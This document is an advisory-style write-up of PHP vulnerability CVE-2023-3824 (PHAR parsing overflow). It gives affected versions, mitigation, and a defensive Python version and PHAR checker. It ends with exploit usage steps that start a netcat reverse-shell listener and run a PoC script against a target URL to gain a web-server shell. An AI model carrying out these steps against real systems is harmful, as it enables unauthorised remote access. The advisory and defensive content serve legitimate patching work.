CVE-2023-3824 is a critical remote code execution (RCE) vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from insufficient length checking when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the Phar::loadPhar() function.
- Stack Buffer Overflow: The vulnerability stems from improper bounds checking, which can lead to a stack buffer overflow. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- Memory Corruption: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- Remote Code Execution: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.
The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.
A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.
- Update PHP: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- Avoid Untrusted PHAR Files: As a general security measure, ensure your application avoids processing untrusted PHAR files.
This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
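The following is an added example, not code from the PoC or from the PHP project: a defender-side check that maps a PHP version string onto the fixed releases named above (8.0.30, 8.1.22, 8.2.8) and a crude content check for phar-format uploads, as one way to act on the "avoid untrusted PHAR files" advice. The version thresholds come from the text above; the sample inputs are constructed.

```python
from typing import Optional, Tuple

# First fixed release per affected minor branch, taken from the text above.
FIXED_RELEASES = {
    (8, 0): (8, 0, 30),
    (8, 1): (8, 1, 22),
    (8, 2): (8, 2, 8),
}

def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '8.1.21-1ubuntu1' or '8.2.8' (PHP_VERSION style) into (major, minor, patch)."""
    core = version.split("-", 1)[0].split("+", 1)[0]
    parts = core.split(".")
    if len(parts) < 3 or not all(p.isdigit() for p in parts[:3]):
        raise ValueError(f"unrecognised PHP version string: {version!r}")
    return int(parts[0]), int(parts[1]), int(parts[2])

def is_vulnerable(version: str) -> Optional[bool]:
    """True if the version falls in an affected range listed above, False if it is
    a fixed release or outside the listed branches, None if it cannot be parsed.
    Caveat: distribution packages may backport the fix without bumping the version,
    so treat True as "needs verification", not proof."""
    try:
        major, minor, patch = parse_version(version)
    except ValueError:
        return None
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        return False  # 7.4.x, 8.3.x, ...: not in the ranges the text lists
    return (major, minor, patch) < fixed

# phar-format archives end their stub with __HALT_COMPILER(); refusing uploads
# that carry this marker is a cheap first filter for untrusted PHAR content.
PHAR_STUB_MARKER = b"__HALT_COMPILER"

def looks_like_phar(data: bytes) -> bool:
    """Crude content check for phar-format (not tar/zip-based) archives."""
    return PHAR_STUB_MARKER in data

if __name__ == "__main__":
    for v in ("8.0.29", "8.0.30", "8.1.21-1ubuntu1", "8.2.8", "7.4.33", "bogus"):
        print(v, is_vulnerable(v))
    sample = b"<?php echo 'hi'; __HALT_COMPILER(); ?>\r\n" + b"\x00" * 8  # constructed
    print(looks_like_phar(sample))
```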
Run a reverse shell listener:
nc -l local_port
Then run the PoC:
bash cve-2023-3824.sh remote_url local_ip local_port
- remote_url is the vulnerable remote PHP script, e.g. https://wp.example.com/form-uploader.php
- local_ip is the attacker machine's IP
- local_port is the attacker machine's port
If the exploit succeeds, you'll get a shell with the web server's (Apache, Nginx) permissions.
inspired by ::PerfectForms::